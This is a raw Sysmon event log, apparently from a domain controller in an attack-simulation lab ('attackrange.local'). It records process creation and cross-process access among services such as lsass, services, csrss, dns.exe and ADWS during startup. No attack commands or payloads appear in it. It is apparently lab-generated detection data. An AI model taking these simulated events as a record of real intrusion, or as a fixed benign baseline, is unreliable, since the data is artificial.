13:34:14.882{59A5CD1D-8E44-6005-0B00-00000000A301}8562700C:\Windows\system32\lsass.exe{59A5CD1D-8E42-6005-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001240Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.880{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001239Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.879{59A5CD1D-8E44-6005-0A00-00000000A301}8482672C:\Windows\system32\services.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+3332|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001238Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.841{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe13.01System activity monitorSysinternals SysmonSysinternals - www.sysinternals.com-C:\Windows\sysmon64.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8A914CFB7496B8461285C009DD8F5627,SHA256=422EC998FED690C2EC3239A4BB80075F098A9A95CBDFFBC873365B9F7136A02A,IMPHASH=DCF866F4139DD7FF6C0A5D4FA050CD7A{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001237Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.871{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001236Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.871{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001235Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.871{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001234Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.870{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E56-6005-2900-00000000A301}2768C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001233Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.870{59A5CD1D-8E44-6005-0A00-00000000A301}8481208C:\Windows\system32\services.exe{59A5CD1D-8E56-6005-2900-00000000A301}2768C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001232Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.837{59A5CD1D-8E56-6005-2900-00000000A301}2768C:\Windows\System32\dns.exe10.0.14393.3930 (rs1_release.200901-1914)Domain Name System (DNS) ServerMicrosoft® Windows® Operating SystemMicrosoft Corporationdns.exeC:\Windows\system32\dns.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=9D6D2A8F016923E865F944F5505CAFE6,SHA256=B48220FB5B78641ACF5566E798374E9C51FED61CE0559843364E7BD664C30864,IMPHASH=F11D7ACAC98040FCC69808598F92C5FA{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001231Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.850{59A5CD1D-8E44-6005-0A00-00000000A301}8481108C:\Windows\system32\services.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001230Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.849{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E56-6005-2C00-00000000A301}2588C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001229Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.849{59A5CD1D-8E44-6005-0A00-00000000A301}8481100C:\Windows\system32\services.exe{59A5CD1D-8E56-6005-2C00-00000000A301}2588C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001228Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.849{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001227Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.839{59A5CD1D-8E56-6005-2C00-00000000A301}2588C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe10.0.14393.4046Microsoft.ActiveDirectory.WebServicesMicrosoft (R) Windows (R) Operating SystemMicrosoft CorporationMicrosoft.ActiveDirectory.WebServices.exeC:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=868245AE57651C1D8889B528A182C81A,SHA256=2BA73582B4334AEDA469B97D528C24CCB2392FD189524198017D59DF4C4F6504,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001226Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.848{59A5CD1D-8E44-6005-0A00-00000000A301}8481108C:\Windows\system32\services.exe{59A5CD1D-8E56-6005-2B00-00000000A301}2628C:\Windows\System32\ismserv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001225Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.845{59A5CD1D-8E44-6005-0B00-00000000A301}8562700C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001224Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.845{59A5CD1D-8E44-6005-0B00-00000000A301}8562700C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001223Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.842{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001222Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.842{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001221Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.842{59A5CD1D-8E44-6005-0B00-00000000A301}8562700C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001220Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.841{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E56-6005-2B00-00000000A301}2628C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001219Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.841{59A5CD1D-8E44-6005-0A00-00000000A301}848948C:\Windows\system32\services.exe{59A5CD1D-8E56-6005-2B00-00000000A301}2628C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001218Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.839{59A5CD1D-8E56-6005-2B00-00000000A301}2628C:\Windows\System32\ismserv.exe10.0.14393.0 (rs1_release.160715-1616)Windows NT Intersite Messaging ServiceMicrosoft® Windows® Operating SystemMicrosoft Corporationismserv.exeC:\Windows\System32\ismserv.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=39F0EC2CAE7FF38BABDDE2252ACCEA67,SHA256=29BDF4D2040D24E02B830A272D02CF29F19FD4E1A0F54F22BCC76301A0BFD26F,IMPHASH=088F7CD1DAA87B8E05239EDAB00479BB{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001217Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.839{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001216Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.839{59A5CD1D-8E44-6005-0A00-00000000A301}8482684C:\Windows\system32\services.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+ddc1|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001215Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.836{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001214Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001213Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001212Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 